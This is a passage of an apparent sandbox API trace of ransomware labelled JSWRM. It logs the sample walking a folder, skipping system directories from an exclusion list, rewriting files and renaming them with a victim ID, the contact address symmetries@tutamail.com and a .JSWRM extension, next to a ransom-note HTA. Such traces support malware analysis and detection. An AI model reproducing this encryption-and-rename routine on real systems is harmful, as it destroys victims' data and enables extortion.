lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0058.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0058.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0058.755] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1030\\jswrm-decrypt.hta")) returned 0x20 [0058.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0058.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.755] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19ae336e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0058.755] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.755] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19ae336e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.755] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.755] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.755] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0058.755] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0058.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0058.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0058.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0058.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0058.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.756] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0058.756] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.756] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3314) returned 1 [0058.756] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.756] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcf0) returned 0x23dc88 [0058.756] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xcf0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xcf0, lpOverlapped=0x0) returned 1 [0058.758] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.758] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xcf0, lpOverlapped=0x0) returned 1 [0058.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0058.758] CloseHandle (hObject=0x3d4) returned 1 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0058.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.759] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0058.760] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19ae336e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19ae336e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19ae336e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.760] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.761] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0058.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0058.761] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.761] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=77748) returned 1 [0058.761] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12fb0) returned 0x2471a8 [0058.762] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x12fb0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x12fb0, lpOverlapped=0x0) returned 1 [0058.768] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.768] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x12fb0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x12fb0, lpOverlapped=0x0) returned 1 [0058.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.769] CloseHandle (hObject=0x3d4) returned 1 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0058.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0058.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.771] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0058.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.772] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0058.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0058.772] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.772] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.772] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.772] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.772] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.772] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.773] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.773] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.773] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.773] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.773] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0058.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0058.773] HeapFree (in: hHeap=0x1e0000, 